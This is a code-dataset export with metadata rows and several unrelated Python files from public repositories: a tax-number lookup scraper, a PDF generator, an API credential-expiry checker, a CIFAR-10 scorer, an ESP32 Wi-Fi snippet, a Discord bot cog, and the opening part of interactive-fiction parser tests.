| 0.470588
| 0.053892
| 0.026946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018307
| 0.30024
| 1,249
| 42
| 157
| 29.738095
| 0.744851
| 0.069656
| 0
| 0
| 0
| 0
| 0.082251
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.038462
| 0
| 0.384615
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb66fc7050d575d46b09f705e4a0c71d8c66cda1
| 11,303
|
py
|
Python
|
inn.py
|
NLipatov/INNer
|
88816c91bfb85f287b734aff69a5b60ad43f129e
|
[
"MIT"
] | null | null | null |
inn.py
|
NLipatov/INNer
|
88816c91bfb85f287b734aff69a5b60ad43f129e
|
[
"MIT"
] | null | null | null |
inn.py
|
NLipatov/INNer
|
88816c91bfb85f287b734aff69a5b60ad43f129e
|
[
"MIT"
] | null | null | null |
import time, os, xlrd, xlwt, re, webbrowser, time_convert, Process_killer, tkinter as tk
from tkinter import messagebox as mb
from xlwt import easyxf
from threading import Thread
from selenium import webdriver
from selenium.common.exceptions import SessionNotCreatedException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from subprocess import CREATE_NO_WINDOW
from xlutils.copy import copy
direction = None
workbookname = None
status = ''
def DirWor(Dir, Wor):
global direction
global workbookname
direction = Dir
workbookname = Wor
innermessage = 'Работа над файлом'
message = ''
refreshedINN = 0
def Add_to_Message(arg):
global message
message += str( arg )
def Get_message():
return innermessage + message
def TT():
os.chdir( direction )
def Draw():
global text, status
status = 'Файл в работе'
frame = tk.Frame( root, relief='solid', bd=1, bg='grey' )
root.geometry( '700x90+500+600' )
    root.iconbitmap( r"C:\INNer\INNERICC.ico" )
root.title( 'Файл в работе' )
    try:
        window.iconbitmap( r"C:\INNer\INNERICC.ico" )
    except Exception:  # the secondary window may not exist yet
        pass
frame.pack()
text = tk.Label( frame, text='HELLO' )
text.pack( side='top' )
def Refresher():
global text
text.configure( text=Get_message() )
root.after( 1000, Refresher )
if status == 'Готово':
root.title( status )
root.lift()
root.attributes( '-topmost', True )
root.after_idle( root.attributes, '-topmost', False )
else:
root.title( status )
root = tk.Tk()
Draw()
Refresher()
root.mainloop()
def Main():
global innermessage, message, status
DriverPath = r'C:\INNer\chromedriver.exe'
os.chdir( direction )
TotalWorkingTimeStart = time.time()
Chk1 = 0
    if not os.path.isfile( DriverPath ):
        while True:
            status = 'Ошибка'
            innermessage = 'Ошибка'
            message = ('Не обнаружен chromedriver.exe в папке с INNer\'ом')
workbook = xlrd.open_workbook( workbookname )
sheet = workbook.sheet_by_index( 0 )
workbookWT = xlrd.open_workbook( (workbookname), formatting_info=True )
sheetWT = workbookWT.sheet_by_index( 0 )
wb = copy( workbookWT )
wbsheet = wb.get_sheet( 0 )
options = Options()
options.add_argument( '--headless' )
options.add_argument( '--disable-gpu' )
options.add_experimental_option( 'excludeSwitches', ['enable-logging'] )
try:
driver = webdriver.Chrome( f'{DriverPath}', options=options )
except SessionNotCreatedException as session_not_created_ex:
error_text = str( session_not_created_ex )[29:]
status = 'Ошибка'
innermessage = 'Описание возникшей ошибки:'
message = (f'\n{error_text}')
if mb.askyesno( title='Требуется обновление chromedriver.exe', \
message='Перейти на страницу загрузи chromedriver?' ):
Process_killer.process_kill( 'chromedriver.exe' )
webbrowser.open( 'https://chromedriver.chromium.org/downloads' )
mb.showinfo( title='Подсказка', \
message='После загрузки новой версии \'chromedriver.exe\',\
скопируйте её в C:\INNer с заменой файлов' )
while True:
pass
TotalClientsNumber = sheet.nrows - 1
TotalClientsNumberNowWorking = 0
RFW = 1
infoApproxTime = (f'Ожидаемое время работы {(3.7 * sheet.nrows - TotalClientsNumber) / 60} минут(-ы)\n\n\n')
message = str( infoApproxTime )
try:
for i in range( 1, sheet.nrows ):
message = str( f'\n\nКлиентов обработано: {TotalClientsNumberNowWorking}/{TotalClientsNumber}\n' )
ST = time.time()
RFW = i
translit_name = sheet.cell_value( i, 5 )
re_res = re.findall( r'^\w+', f'{translit_name}' )
if re_res[0].lower() in ['mister', 'mistress', 'mizz', 'miss', 'mr', 'mrs', 'miss', 'ms', 'dr']:
corrected_translit_name = translit_name.replace( f'{re_res[0]} ', '' )
wbsheet.write( i, 5, corrected_translit_name, easyxf( 'font: name Calibri, height 220;' ) )
wb.save( 'INNERED — ' + workbookname )
nam = sheet.cell_value( i, 2 )
if nam == '':
message += str( '\n\n\nBreak. File ends here — blank cell at clients name\n\n\n' )
break
otch = sheet.cell_value( i, 3 )
lotch = str( sheet.cell_value( i, 3 ) ).lower()
fam = sheet.cell_value( i, 4 )
pnum = sheet.cell_value( i, 7 ) + sheet.cell_value( i, 8 )
bdate = sheet.cell_value( i, 19 ).replace( '-', '' )
if lotch == '' or lotch == 'отсутствует' or lotch == 'нет' or lotch == '-':
middle_name = False
else:
middle_name = True
if middle_name:
infoNowWorkingOnClient = str( f'Приступил к: {fam} {nam[0]}. {otch[0]}.' )
print(middle_name)
elif not middle_name:
infoNowWorkingOnClient = str( f'Приступил к: {fam} {nam[0]}.' )
print( middle_name )
message = message + str( infoNowWorkingOnClient )
refreshedINN = 0
if RFW != i:
Chk1 += 1
while True:
status = 'Ошибка'
innermessage = 'Ошибка'
message = ('Критическая ошибка: RFW != i!')
pass
if fam == sheet.cell_value( i, 4 ):
pass
else:
while True:
status = 'Ошибка'
innermessage = 'Ошибка'
message = ('\nЗавершение работы - Критическая ошибка - Фамилия из сайта и из файла не совпали')
pass
if Chk1 < 1:
for i in range( 0, 10 ):
try:
driver.get( 'https://service.nalog.ru/static/personal-data.html?svc=inn&from=%2Finn.do' )
driver.find_element_by_id( "unichk_0" ).click()
driver.find_element_by_id( "btnContinue" ).click()
time.sleep( 0.5 )
for i in range( 0, (len( fam )) ):
driver.find_element_by_name( "fam" ).send_keys( fam[i] )
for i in range( 0, (len( nam )) ):
driver.find_element_by_name( "nam" ).send_keys( nam[i] )
if lotch == '' or lotch == 'отсутствует' or lotch == 'нет' or lotch == '-':
driver.find_element_by_xpath( '//*[@id="unichk_0"]' ).click()
else:
for i in range( 0, (len( otch )) ):
driver.find_element_by_name( "otch" ).send_keys( otch[i] )
for i in range( 0, (len( bdate )) ):
driver.find_element_by_name( "bdate" ).send_keys( bdate[i] )
for i in range( 0, (len( pnum )) ):
driver.find_element_by_name( "docno" ).send_keys( pnum[i] )
driver.find_element_by_id( "btn_send" ).click()
break
                    except Exception:  # the request failed before returning a result; retry
status = 'Ошибка'
innermessage = 'Ошибка возникла до получения результата запроса, после отправки запроса.'
for i in range( 0, 10 ):
try:
result = driver.find_element_by_xpath( '//*[@id="result_1"]/div' ).text
if result == '':
time.sleep( 0.5 )
if i == 9:
res_msg = driver.find_element_by_xpath(
'/html/body/div[1]/div[3]/div/form/div[1]/div[1]/div/div[2]/p[1]' ).text
status = 'Ошибка'
innermessage = f'{res_msg}'
TotalClientsNumberNowWorking += 1
wbsheet.write( RFW, 17, '-' )
break
else:
wbsheet.write( RFW, 17, (result[32:69]) )
ET = time.time()
print( f'\nИНН:{result[32:69]}' )
wb.save( 'INNERED — ' + workbookname )
status = 'Файл в работе'
innermessage = f'Записал — ИНН клиента {fam}: {result[32:69]}' + \
'\nРезультат получен и записан за %.1f секунды' % ((ET - ST))
TotalClientsNumberNowWorking += 1
break
                    except Exception:  # result element not found yet; retry
if i == 9:
status = 'Файл в работе'
innermessage = 'Не нашёл элемент, содержащий ИНН'
message = (f'i - {i}, fam - {fam}')
wbsheet.write( RFW, 17, '-' )
wb.save( 'INNERED — ' + workbookname )
TotalClientsNumberNowWorking += 1
else:
status = 'Критическая ошибка'
innermessage = 'Работа программы остановлена'
message = ('Не пройдена проверка Chk1.')
except PermissionError:
status = 'Критическая ошибка'
innermessage = 'Работа программы остановлена'
message = ('Критическая ошибка — Файл нужно закрыть!')
driver.quit()
if Chk1 == 0:
status = 'Готово!'
innermessage = '\nРабота завершена остановлена'
message = ('\nФайл обработан')
else:
status = 'Результат работы не подлежит использованию!'
innermessage = 'Внимание:'
message = ('Работа завершена с ошибками!')
while True:
pass
TotalWorkingTimeEnd = time.time()
innermessage = 'Готово'
EndingA = ('\nПрограмма отработала за %.1f минут(-ы)' % (((TotalWorkingTimeEnd - TotalWorkingTimeStart) / 60)))
EndingB = ('\nТемп равен %.1f секунд(-ы) на одного клиента' % (
((TotalWorkingTimeEnd - TotalWorkingTimeStart) / sheet.nrows)))
message = str( EndingA )
message += str( EndingB )
workbook.release_resources()
status = 'Работа завершена'
def Start():
MAin_thread = Thread( target=Main )
MAin_thread.start()
TT_thread = Thread( target=TT )
TT_thread.start()
# Destroyer_thread = Thread(target=Destroyer())
# Destroyer_thread.start()
# MAin_thread.join()
# TT_thread.join()
| 41.862963
| 116
| 0.508891
| 1,116
| 11,303
| 5.061828
| 0.305556
| 0.019472
| 0.033103
| 0.036998
| 0.203222
| 0.137723
| 0.111524
| 0.088865
| 0.052753
| 0.033634
| 0
| 0.016064
| 0.383173
| 11,303
| 269
| 117
| 42.018587
| 0.793316
| 0.009378
| 0
| 0.3125
| 0
| 0
| 0.184839
| 0.022704
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033333
| false
| 0.033333
| 0.041667
| 0.004167
| 0.079167
| 0.0125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb67eb4b7ecd3f699aaf7a537dafe8901082a0fc
| 1,474
|
py
|
Python
|
pdf_gen.py
|
MasatoHanayama/pdf_gen
|
b16491a31cea0d1a4931e979d600870d6be07c3e
|
[
"MIT"
] | 1
|
2022-03-15T12:57:46.000Z
|
2022-03-15T12:57:46.000Z
|
pdf_gen.py
|
MasatoHanayama/pdf_gen
|
b16491a31cea0d1a4931e979d600870d6be07c3e
|
[
"MIT"
] | null | null | null |
pdf_gen.py
|
MasatoHanayama/pdf_gen
|
b16491a31cea0d1a4931e979d600870d6be07c3e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import argparse
import img2pdf
import tqdm
from natsort import natsorted
from PIL import Image
def pdf_gen(src, dst):
pages = []
    for file in natsorted(os.listdir(src)):
        if os.path.splitext(file)[-1] in ('.jpg', '.jpeg', '.png'):
            pages.append(os.path.join(src, file))
if len(pages) == 0:
print("Failed: {}".format(src))
return
with open(dst, 'wb') as pdf:
pdf.write(img2pdf.convert(pages))
def webp2png(src):
for file in natsorted(os.listdir(src)):
if os.path.splitext(file)[-1] == '.webp':
im = Image.open(os.path.join(src, file)).convert('RGB')
im.save(os.path.join(src, '{}.png'.format(os.path.splitext(file)[0])), 'png')
os.remove(os.path.join(src, file))
def main(src_path):
dirs = [f.path for f in os.scandir(src_path) if f.is_dir()]
# for dir in tqdm.tqdm(dirs):
for dir in dirs:
print(dir)
webp2png(dir)
pdf_gen(dir, '{}.pdf'.format(dir))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('src', help='src dir')
args = parser.parse_args()
main(args.src)
# dirs = [f.path for f in os.scandir(args.src) if f.is_dir()]
# # for dir in tqdm.tqdm(dirs):
# for dir in dirs:
# print(dir)
# webp2png(dir)
# pdf_gen(dir, '{}.pdf'.format(dir))
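Programmatic equivalent of the argparse entry point above; ./scans is an illustrative directory whose sub-directories each become one PDF:
main("./scans")  # webp -> png, then images -> one <subdir>.pdf per sub-directory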
| 28.346154
| 129
| 0.586839
| 220
| 1,474
| 3.854545
| 0.295455
| 0.063679
| 0.082547
| 0.106132
| 0.475236
| 0.415094
| 0.365566
| 0.365566
| 0.308962
| 0.308962
| 0
| 0.010667
| 0.236771
| 1,474
| 51
| 130
| 28.901961
| 0.743111
| 0.154003
| 0
| 0.060606
| 0
| 0
| 0.053355
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.181818
| 0
| 0.30303
| 0.060606
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb67fb540424cdb298487932ac6c8b19b1c4e193
| 1,113
|
py
|
Python
|
userapiexpiry.py
|
tjarrettveracode/veracode-python-api_credentials_expiry-example
|
3188c53f81c4bf0b5f4d27f4aa1dc3de2f3f5aef
|
[
"MIT"
] | null | null | null |
userapiexpiry.py
|
tjarrettveracode/veracode-python-api_credentials_expiry-example
|
3188c53f81c4bf0b5f4d27f4aa1dc3de2f3f5aef
|
[
"MIT"
] | null | null | null |
userapiexpiry.py
|
tjarrettveracode/veracode-python-api_credentials_expiry-example
|
3188c53f81c4bf0b5f4d27f4aa1dc3de2f3f5aef
|
[
"MIT"
] | null | null | null |
import sys
import requests
import datetime
from dateutil.parser import parse
from veracode_api_py import VeracodeAPI as vapi
def creds_expire_days_warning():
creds = vapi().get_creds()
exp = datetime.datetime.strptime(creds['expiration_ts'], "%Y-%m-%dT%H:%M:%S.%f%z")
    delta = exp - datetime.datetime.now().astimezone()  # both sides timezone-aware, so the subtraction is valid
if (delta.days < 7):
print('These API credentials expire {}'.format(creds['expiration_ts']))
def main():
# CHECK FOR CREDENTIALS EXPIRATION
creds_expire_days_warning()
data = vapi().get_users()
for user in data:
data2 = vapi().get_user(user["user_id"])
if "api_credentials" in data2:
date_time_str = parse(data2["api_credentials"]["expiration_ts"])
date = date_time_str.date()
time = date_time_str.time()
print("User {} API Credentials expiration date is {} {}".format(user["user_name"],str(date),str(time)))
else:
print("User {} has no API credentials".format(user["user_name"]))
if __name__ == '__main__':
main()
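# Standalone sketch of the timestamp handling used above; it needs no
# Veracode credentials, and the sample value is an assumption in the same
# ISO-8601 format the API returns.
import datetime
from dateutil.parser import parse

sample = "2022-06-01T12:00:00.000+00:00"
exp = parse(sample)
print(exp.date(), exp.time(), (exp - datetime.datetime.now().astimezone()).days)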
| 32.735294
| 115
| 0.645103
| 147
| 1,113
| 4.659864
| 0.414966
| 0.10219
| 0.048175
| 0.064234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004582
| 0.215633
| 1,113
| 34
| 116
| 32.735294
| 0.780069
| 0.060198
| 0
| 0
| 0
| 0
| 0.222967
| 0.021053
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.2
| 0
| 0.28
| 0.12
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb68392d7aa3e6ae41470c5c442a63fe00343194
| 3,258
|
py
|
Python
|
recipes/tensorflow/samples/pytorch/cifar10/samples/tensorflow/scorer.py
|
arturrutkiewicz-divae/aep-rfm-score
|
705fc54e505fdb8763073401be7b97c81474b0a9
|
[
"Apache-2.0"
] | 18
|
2018-12-13T18:53:31.000Z
|
2021-09-29T20:14:05.000Z
|
recipes/tensorflow/samples/pytorch/cifar10/samples/tensorflow/scorer.py
|
DalavanCloud/experience-platform-dsw-reference
|
2e0af85a47ec05b7cda77d61954c1cde0a625f5c
|
[
"Apache-2.0"
] | 27
|
2019-01-02T22:52:51.000Z
|
2021-05-26T15:14:17.000Z
|
recipes/tensorflow/samples/pytorch/cifar10/samples/tensorflow/scorer.py
|
DalavanCloud/experience-platform-dsw-reference
|
2e0af85a47ec05b7cda77d61954c1cde0a625f5c
|
[
"Apache-2.0"
] | 18
|
2019-01-09T19:34:57.000Z
|
2020-10-19T11:06:50.000Z
|
#
# Copyright 2017 Adobe.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from ml.runtime.tensorflow.Interfaces.AbstractScorer import AbstractScorer
import tensorflow as tf
import numpy
import torch
import torchvision
import torchvision.transforms as transforms
import torch.nn as nn
import torch.nn.functional as F


class Scorer(AbstractScorer):
    def score(self, config={}):
        """Loads trained weights and scores on the CIFAR-10 test data:
        load the trained model from its weights,
        load the test dataset,
        score and compute accuracy.

        :param config: passed on by ml-framework
        :return: None
        """
        print("Executed scorer 2")
        print(config["modelPATH"])
        print(config["logsPATH"])

        class Net(nn.Module):
            def __init__(self):
                super(Net, self).__init__()
                self.conv1 = nn.Conv2d(3, 6, 5)
                self.pool = nn.MaxPool2d(2, 2)
                self.conv2 = nn.Conv2d(6, 16, 5)
                self.fc1 = nn.Linear(16 * 5 * 5, 120)
                self.fc2 = nn.Linear(120, 84)
                self.fc3 = nn.Linear(84, 10)

            def forward(self, x):
                x = self.pool(F.relu(self.conv1(x)))
                x = self.pool(F.relu(self.conv2(x)))
                x = x.view(-1, 16 * 5 * 5)
                x = F.relu(self.fc1(x))
                x = F.relu(self.fc2(x))
                x = self.fc3(x)
                return x

        transform = transforms.Compose(
            [transforms.ToTensor(),
             transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
        testset = torchvision.datasets.CIFAR10(root='./data',
                                               train=False,
                                               download=True,
                                               transform=transform)
        testloader = torch.utils.data.DataLoader(testset,
                                                 batch_size=4,
                                                 shuffle=False,
                                                 num_workers=2)

        net = Net()
        state_dict = torch.load(config["modelPATH"] +
                                "/my_cifar_pytorch_model.dict")
        net.load_state_dict(state_dict)

        correct = 0
        total = 0
        with torch.no_grad():
            for data in testloader:
                images, labels = data
                outputs = net(images)
                _, predicted = torch.max(outputs.data, 1)
                total += labels.size(0)
                correct += (predicted == labels).sum().item()

        print('Accuracy of the network on the 10000 test images: %d %%' % (
            100 * correct / total))
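# Hedged driver sketch for the Scorer above. Whether AbstractScorer takes
# constructor arguments is not shown in this file, so the bare call is an
# assumption, as are both paths.
if __name__ == '__main__':
    scorer = Scorer()
    scorer.score({"modelPATH": "./model", "logsPATH": "./logs"})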
| 34.659574
| 75
| 0.533456
| 380
| 3,258
| 4.523684
| 0.45
| 0.034904
| 0.008726
| 0.011635
| 0.029087
| 0.029087
| 0.029087
| 0.006981
| 0.006981
| 0.006981
| 0
| 0.039942
| 0.369859
| 3,258
| 93
| 76
| 35.032258
| 0.79737
| 0.229589
| 0
| 0
| 0
| 0
| 0.054076
| 0.011471
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053571
| false
| 0
| 0.142857
| 0
| 0.25
| 0.071429
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb69a0519f4167f3e5c1740dabcb4206f8eb16f8
| 261
|
py
|
Python
|
Projects/ESP32Micropython/flash memory/newConnectTest.py
|
TizioMaurizio/ArduinoWorkshop
|
d38ede91c6b7a925eafb0272a5fa9f44885ae017
|
[
"MIT"
] | null | null | null |
Projects/ESP32Micropython/flash memory/newConnectTest.py
|
TizioMaurizio/ArduinoWorkshop
|
d38ede91c6b7a925eafb0272a5fa9f44885ae017
|
[
"MIT"
] | null | null | null |
Projects/ESP32Micropython/flash memory/newConnectTest.py
|
TizioMaurizio/ArduinoWorkshop
|
d38ede91c6b7a925eafb0272a5fa9f44885ae017
|
[
"MIT"
] | null | null | null |
import network
import time

sta_if = network.WLAN(network.STA_IF)
sta_if.active(True)
for _ in range(10):
    sta_if.connect('RedmiMau', 'mau12397')
    time.sleep(1)
    if sta_if.isconnected():
        print('Connected.')
        break
    time.sleep(11)
else:
    print('Fail')
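# Hedged follow-up once the loop above prints 'Connected.': MicroPython's
# WLAN objects expose ifconfig() for the addresses the AP assigned.
if sta_if.isconnected():
    print(sta_if.ifconfig())  # (ip, netmask, gateway, dns)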
| 20.076923
| 39
| 0.701149
| 40
| 261
| 4.425
| 0.6
| 0.141243
| 0.079096
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045045
| 0.149425
| 261
| 13
| 40
| 20.076923
| 0.752252
| 0
| 0
| 0
| 0
| 0
| 0.114504
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.153846
| 0
| 0.153846
| 0.153846
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb6b66c4796e5839d80de0a9f7880f3c7a632215
| 2,829
|
py
|
Python
|
cogs/start.py
|
Yureehh/Perfecto---O---Tron
|
cfd6f1819a9e4b7a9a406061bb7fadfea4084a86
|
[
"MIT"
] | null | null | null |
cogs/start.py
|
Yureehh/Perfecto---O---Tron
|
cfd6f1819a9e4b7a9a406061bb7fadfea4084a86
|
[
"MIT"
] | 1
|
2020-09-16T16:27:52.000Z
|
2020-09-16T16:27:52.000Z
|
cogs/start.py
|
Yureehh/Perfecto---O---Tron
|
cfd6f1819a9e4b7a9a406061bb7fadfea4084a86
|
[
"MIT"
] | null | null | null |
import discord
from discord.ext import commands, tasks
from datetime import datetime
import asyncio
from itertools import cycle

# number of minutes used as the timer for loops
MINUTES_TO_WAIT = 30


# in the brackets there's the class you are extending
class Start(commands.Cog):
    def __init__(self, bot, messages=0, joined=0):
        self.bot = bot
        self.messages = messages
        self.joined = joined
        # Statuses the bot will cycle through. All of them are memes, of course
        self.status = cycle(["League of Lol", "with your mind", "with your fate",
                             "with your secrets", "Fortine is for kids",
                             "CS:GO is old", "Valoraahahahahnt", "with your emotions"])

    async def update_stats(self):
        while not self.bot.is_closed():
            try:
                now = datetime.now()
                current_time = now.strftime("%D %H:%M:%S")
                with open("stats.txt", "a+") as f:
                    f.write(f"Time: {current_time}, Messages: {self.messages}, Members Joined: {self.joined}\n")
                self.messages = 0
                self.joined = 0
                await asyncio.sleep(MINUTES_TO_WAIT * 60)
            except Exception as e:
                print(e)
                await asyncio.sleep(MINUTES_TO_WAIT * 60)

    @commands.Cog.listener()
    async def on_ready(self):
        await self.bot.change_presence(status=discord.Status.online)
        self.changeStatus.start()
        self.bot.loop.create_task(self.update_stats())
        print("Bot launched")

    @tasks.loop(seconds=MINUTES_TO_WAIT * 60)
    async def changeStatus(self):
        await self.bot.change_presence(activity=discord.Game(next(self.status)))

    @commands.Cog.listener()
    async def on_message(self, message):
        self.messages += 1
        # await self.bot.process_commands(message)

    @commands.Cog.listener()
    async def on_member_join(self, member):
        self.joined += 1
        for channel in member.guild.channels:
            if str(channel) == "welcome":
                await channel.send(f"Welcome to the server {member.mention}",
                                   file=discord.File("images/welcome.jpg"))

    @commands.Cog.listener()
    async def on_member_remove(self, member):
        for channel in member.guild.channels:
            if str(channel) == "welcome" or str(channel) == "goodbyes":
                await channel.send(f"{member.mention} left the server",
                                   file=discord.File("images/missYou.jpg"))

    # happens when someone tries to rename himself
    @commands.Cog.listener()
    async def on_member_update(self, before, after):
        n = after.nick
        if n:
            if "Yureeh" in n.lower():
                await after.edit(nick="Don't you dare")


def setup(bot):
    bot.add_cog(Start(bot))
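# Hedged wiring sketch under discord.py 1.x (matching the synchronous
# setup() above); the extension path and token placeholder are assumptions.
from discord.ext import commands

bot = commands.Bot(command_prefix="!")
bot.load_extension("cogs.start")  # invokes setup(bot) defined above
# bot.run("YOUR_DISCORD_TOKEN")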
| 36.269231
| 183
| 0.625309
| 374
| 2,829
| 4.649733
| 0.395722
| 0.028177
| 0.054629
| 0.069005
| 0.222542
| 0.222542
| 0.154687
| 0.057504
| 0.057504
| 0.057504
| 0
| 0.006715
| 0.26299
| 2,829
| 78
| 184
| 36.269231
| 0.827338
| 0.082715
| 0
| 0.157895
| 0
| 0.017544
| 0.170205
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035088
| false
| 0
| 0.087719
| 0
| 0.140351
| 0.035088
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb6cc5ff9b1a00d13872972359a28898848fa4c7
| 14,716
|
py
|
Python
|
tests/test_parser.py
|
RathmoreChaos/intficpy
|
a5076bba93208dc18dcbf2e4ad720af9e2127eda
|
[
"MIT"
] | 25
|
2019-04-30T23:51:44.000Z
|
2022-03-23T02:02:54.000Z
|
tests/test_parser.py
|
RathmoreChaos/intficpy
|
a5076bba93208dc18dcbf2e4ad720af9e2127eda
|
[
"MIT"
] | 4
|
2019-07-09T03:43:35.000Z
|
2022-01-10T23:41:46.000Z
|
tests/test_parser.py
|
RathmoreChaos/intficpy
|
a5076bba93208dc18dcbf2e4ad720af9e2127eda
|
[
"MIT"
] | 5
|
2021-04-24T03:54:39.000Z
|
2022-01-06T20:59:03.000Z
|
from .helpers import IFPTestCase
from intficpy.ifp_game import IFPGame
from intficpy.thing_base import Thing
from intficpy.things import Surface, UnderSpace
from intficpy.actor import Actor, SpecialTopic
from intficpy.verb import (
    IndirectObjectVerb,
    GetVerb,
    LookVerb,
    SetOnVerb,
    LeadDirVerb,
    JumpOverVerb,
    GiveVerb,
    ExamineVerb,
    GetAllVerb,
)
from intficpy.exceptions import ObjectMatchError


class TestParser(IFPTestCase):
    def test_verb_with_no_objects(self):
        self.game.turnMain("look")
        self.assertIs(self.game.parser.command.verb, LookVerb)
        self.assertIsNone(self.game.parser.command.dobj.target)
        self.assertIsNone(self.game.parser.command.iobj.target)

    def test_verb_with_dobj_only(self):
        dobj = Thing(self.game, self._get_unique_noun())
        self.start_room.addThing(dobj)
        self.game.turnMain(f"get {dobj.name}")
        self.assertIs(self.game.parser.command.verb, GetVerb)
        self.assertIs(self.game.parser.command.dobj.target, dobj)
        self.assertIsNone(self.game.parser.command.iobj.target)

    def test_gets_correct_verb_with_dobj_and_direction_iobj(self):
        dobj = Actor(self.game, self._get_unique_noun())
        self.start_room.addThing(dobj)
        iobj = "east"
        self.start_room.east = self.start_room
        self.game.turnMain(f"lead {dobj.name} {iobj}")
        self.assertIs(self.game.parser.command.verb, LeadDirVerb)
        self.assertIs(self.game.parser.command.dobj.target, dobj)
        self.assertEqual(self.game.parser.command.iobj.target, iobj)

    def test_gets_correct_verb_with_preposition_dobj_only(self):
        dobj = Thing(self.game, self._get_unique_noun())
        self.start_room.addThing(dobj)
        self.game.turnMain(f"jump over {dobj.name}")
        self.assertIs(self.game.parser.command.verb, JumpOverVerb)
        self.assertIs(self.game.parser.command.dobj.target, dobj)
        self.assertIsNone(self.game.parser.command.iobj.target)

    def test_gets_correct_verb_with_preposition_dobj_and_iobj(self):
        dobj = Thing(self.game, self._get_unique_noun())
        self.start_room.addThing(dobj)
        iobj = Surface(self.game, self._get_unique_noun())
        self.start_room.addThing(iobj)
        self.game.turnMain(f"set {dobj.name} on {iobj.name}")
        self.assertIs(self.game.parser.command.verb, SetOnVerb)
        self.assertIs(self.game.parser.command.dobj.target, dobj)
        self.assertIs(self.game.parser.command.iobj.target, iobj)


class TestGetGrammarObj(IFPTestCase):
    def test_gets_correct_objects_with_adjacent_dobj_iobj(self):
        dobj_item = Actor(self.game, self._get_unique_noun())
        self.start_room.addThing(dobj_item)
        iobj_item = Thing(self.game, self._get_unique_noun())
        self.start_room.addThing(iobj_item)
        self.game.turnMain(f"give {dobj_item.name} {iobj_item.name}")
        self.assertEqual(self.game.parser.command.dobj.target, dobj_item)
        self.assertEqual(self.game.parser.command.iobj.target, iobj_item)


class TestAdjacentStrObj(IFPTestCase):
    class StrangeVerb(IndirectObjectVerb):
        word = "strange"
        syntax = [["strange", "<iobj>", "<dobj>"]]
        hasStrIobj = True
        iscope = "text"
        dscope = "near"

        # NOTE: nesting reconstructed; the flattened source does not show
        # whether this function sits on StrangeVerb or its enclosing class.
        def strangeVerbFunc(game, dobj, iobj):
            game.addTextToEvent("turn", "You do strange things")
            return True

    def test_thing_follows_string_adjacent_string_object(self):
        thing = Thing(self.game, "thing")
        thing.setAdjectives(["good"])
        self.start_room.addThing(thing)
        self.game.turnMain("strange purple good thing")
        self.assertIs(
            self.game.parser.command.verb,
            self.StrangeVerb,
            "Unexpected verb from command with adjacent string objects where thing "
            "follows string",
        )
        self.assertIs(
            self.game.parser.command.dobj.target,
            thing,
            "Unexpected dobj from command with adjacent string objects where thing "
            "follows string",
        )


class TestGetThing(IFPTestCase):
    def test_get_thing(self):
        noun = self._get_unique_noun()
        self.assertNotIn(
            noun,
            self.game.nouns,
